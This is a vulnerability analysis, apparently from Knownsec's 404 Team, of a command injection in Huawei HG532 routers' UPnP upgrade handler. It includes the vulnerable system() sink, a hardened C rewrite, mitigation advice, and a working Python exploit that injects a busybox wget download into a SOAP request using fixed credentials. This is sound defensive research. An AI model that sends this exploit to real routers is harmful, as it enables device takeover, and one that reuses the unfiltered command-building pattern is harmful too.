Huawei HG532 Series Router Remote Command Execution Analysis

Background

Vulnerability Analysis

The vulnerable code path, as recovered from the firmware, formats the two UPnP arguments straight into a command line and hands it to system():

```c
snprintf($s0, 0x400, "upg -g -U %s -t '1 Firmware Upgrade Image' -c upnp -r %s -d -", NewDownloadURL, NewStatusURL);
system($s0);
```

NewDownloadURL and NewStatusURL come directly from the SOAP request body with no filtering. Because the string is executed through system(), i.e. through /bin/sh, a shell metacharacter such as ';' inside either value terminates the upg command and starts an attacker-controlled one.
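The sink above, as an added example that is not part of the original article or of Huawei's firmware: a C rendering of the vulnerable snprintf()/system() pattern next to a hardened version that allowlists both URLs and passes an argv vector to execv(), so no shell ever re-parses the values. The allowlist policy and the /bin/upg path are assumptions made for this example; the input values are the ones from the PoC request in this article.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Command template as quoted from the HG532 firmware in the analysis above. */
#define UPG_FMT "upg -g -U %s -t '1 Firmware Upgrade Image' -c upnp -r %s -d -"

/*
 * Vulnerable pattern: both UPnP arguments are formatted straight into a
 * command line that the firmware then passes to system().  This function
 * only builds the string so the result can be inspected without running it.
 * Returns 0 on success, -1 if the template did not fit in the buffer.
 */
int build_upgrade_cmd_vulnerable(char *out, size_t outlen,
                                 const char *download_url, const char *status_url)
{
    int n = snprintf(out, outlen, UPG_FMT, download_url, status_url);
    return (n >= 0 && (size_t)n < outlen) ? 0 : -1;
}

/*
 * Allowlist check for an upgrade or status URL: http:// or https://, at most
 * 255 bytes, and only unreserved URL characters (no spaces, quotes or shell
 * metacharacters).  This policy is an assumption for the example, not Huawei's.
 */
int is_safe_url(const char *url)
{
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
        "0123456789-._~:/?=%";
    size_t len = strlen(url);
    if (len == 0 || len > 255) return 0;
    if (strncmp(url, "http://", 7) != 0 && strncmp(url, "https://", 8) != 0)
        return 0;
    for (size_t i = 0; i < len; i++)
        if (strchr(allowed, url[i]) == NULL) return 0;
    return 1;
}

/*
 * Hardened variant: validate both inputs, then build an argv vector for
 * execv().  No shell re-parses the arguments, so even a ';' in a URL would
 * only ever reach upg as part of one argument (and is rejected anyway).
 * Returns the number of argv entries excluding the terminating NULL, or -1
 * if an input is rejected or the argv array is too small.
 */
int build_upgrade_argv_hardened(const char *download_url, const char *status_url,
                                const char *argv[], int max_argv)
{
    if (max_argv < 13) return -1;
    if (!is_safe_url(download_url) || !is_safe_url(status_url)) return -1;
    int i = 0;
    argv[i++] = "upg";
    argv[i++] = "-g";
    argv[i++] = "-U"; argv[i++] = download_url;
    argv[i++] = "-t"; argv[i++] = "1 Firmware Upgrade Image";
    argv[i++] = "-c"; argv[i++] = "upnp";
    argv[i++] = "-r"; argv[i++] = status_url;
    argv[i++] = "-d"; argv[i++] = "-";
    argv[i] = NULL;
    return i;
}

/* Runs the hardened command without a shell.  "/bin/upg" is an assumed path. */
int run_upgrade_hardened(const char *download_url, const char *status_url)
{
    const char *argv[16];
    if (build_upgrade_argv_hardened(download_url, status_url, argv, 16) < 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv("/bin/upg", (char *const *)argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Values taken from the PoC request in this article. */
    const char *download_url = "HUAWEIUPNP";
    const char *status_url = ";/bin/busybox wget -g 192.168.1.2 -l /tmp/1 -r /1;";
    char cmd[0x400];
    const char *argv[16];

    if (build_upgrade_cmd_vulnerable(cmd, sizeof cmd, download_url, status_url) == 0)
        printf("system() would receive:\n  %s\n", cmd);
    printf("hardened builder on PoC input: %d\n",
           build_upgrade_argv_hardened(download_url, status_url, argv, 16));
    printf("hardened builder on clean input: %d\n",
           build_upgrade_argv_hardened("http://192.168.1.2/fw.bin",
                                       "http://192.168.1.2/status", argv, 16));
    return 0;
}
```

Running it prints the exact string the firmware would hand to /bin/sh, with the injected busybox wget sitting between the -r flag and -d, and shows the hardened builder returning -1 for the same input. The important design choice is the second one: validation alone is fragile, but replacing system() with an argv-based exec removes the shell from the path entirely, so a missed character in the allowlist can no longer become a second command.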
The proof of concept sends a single SOAP Upgrade request to the UPnP service on port 37215, placing the command to run inside NewStatusURL:

```python
import requests

# Authorization header exactly as used in the original PoC (fixed Digest values).
headers = {
    "Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, "
                     "nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, "
                     "response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, "
                     "nc=00000001, cnonce=248d1a2560100669"
}

# SOAP body for the Upgrade action.  NewStatusURL carries the injected command:
# the leading ';' terminates the upg command line and the trailing ';' closes
# the injected one, so /bin/sh runs the busybox wget between them.
data = '''<?xml version="1.0" ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewStatusURL>;/bin/busybox wget -g 192.168.1.2 -l /tmp/1 -r /1;</NewStatusURL>
<NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
</u:Upgrade>
</s:Body>
</s:Envelope>
'''

# 192.168.1.1 is the router; 37215 is the port of the UPnP service that handles DeviceUpgrade_1.
requests.post('http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1', headers=headers, data=data)
```
Mitigation

  • Configure the built-in firewall function so that the UPnP service on port 37215 is not reachable from untrusted networks.
  • Change the default password.
  • Deploy a firewall at the carrier side.

Conclusion

  1. Similar to the command injection in SetNTPServers on broadband routers in Ireland【3】, this vulnerability appears to be a straightforward concatenation of user input into a command.
  2. This vulnerability also points researchers in a useful direction when hunting for bugs: pay close attention to the code around functions such as snprintf() and system().
  3. Any variable that reaches such functions is dangerous. Most RCE vulnerabilities arise either from missing filtering, which lets untrusted input be concatenated into a command, or from missing length checks on variables, which leads to buffer overflows. On this point the equipment supplier bears the responsibility: it is important to develop software with security awareness.

Reference link

--

--

--

404 Team, the core team of the well-known Chinese security company Knownsec. Twitter: @seebug_team  YouTube: @404team knownsec  Email: zoomeye@knownsec.com
